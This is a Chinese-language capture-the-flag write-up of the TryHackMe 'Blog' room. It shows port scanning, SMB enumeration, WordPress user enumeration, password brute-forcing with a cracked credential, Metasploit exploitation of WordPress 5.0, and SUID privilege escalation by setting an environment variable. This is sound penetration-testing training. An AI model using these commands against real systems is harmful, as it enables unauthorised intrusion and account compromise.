【THM】Blog-Practice

本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/blog

Difficulty: Medium

Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!

Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…

In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.

Credit to Sq00ky for the root privesc idea ;)

端口扫描

1
nmap -p- -sC -sV -T4 10.10.131.180

image-20231202172417395

PORT STATE SERVICE

22 open ssh

80 open http

139 open netbios-ssn

445 open netbios-ssn

首先我们看到有smb端口 我们尝试用enum4linux来枚举

1
enum4linux -a 10.10.131.180

image-20231202161126853

我们可以看到有个BillySMB

1
smbclient //10.10.131.180/BillySMB

image-20231202172829736

下载下来

image-20231202173503032

image-20231202173954555

image-20231202174006229

找到一个兔子洞,什么意思

还有一个二维码,跳转到

https://qrgo.page.link/M6dE

最后一个文件则是mp4

似乎进入了死洞

首先检查80端口

看看有什么

1
gobuster dir -u 10.10.131.180 -w /usr/share/wordlists/rockyou.txt

检查robots.txt

1
2
3
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

这是一个非常标准的 Wordpress 网站。对于枚举,我们有一个很棒的工具,称为wpscan,它允许我们枚举用户名,然后暴力破解它们

但是10.10.131.180/wp-admin/好像访问不了

我们就编辑/etc/hosts

1
10.10.131.180 blog.thm
1
wpscan --url  10.10.131.180 --enumerate u

image-20231202175807477

image-20231202175917423

有两个用户:bjoel 和 kwheel

而且这是易受攻击的WordPress 5.0

image-20231205224949149

通过阅读它,我们了解到我们需要具有作者访问权限的人的用户名和密码

那我们就开始爆破

1
wpscan --url 10.10.90.177 -U kwheel,bjoel -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 64
1
| Username: kwheel, Password: cutiepie1

成功登上

image-20231205232506171

然后用msf

image-20231205232601459

image-20231205232641654

image-20231205232816396

现在只需设置选项(USERNAME、PASSWORD、RHOSTS、LHOST)并利用!

image-20231205233252882

getshell

image-20231205233445283

1
find / -perm -u=s -type f 2>/dev/null

image-20231206000323274

image-20231206001851404

因此,它获取“admin”环境变量并打印出“Not an Admin”。等等,那么如果我们设置这个环境变量,会发生什么

1
export admin=1

image-20231206002116230

image-20231206002157143

image-20231206002209026

image-20231206002223610

image-20231206002300668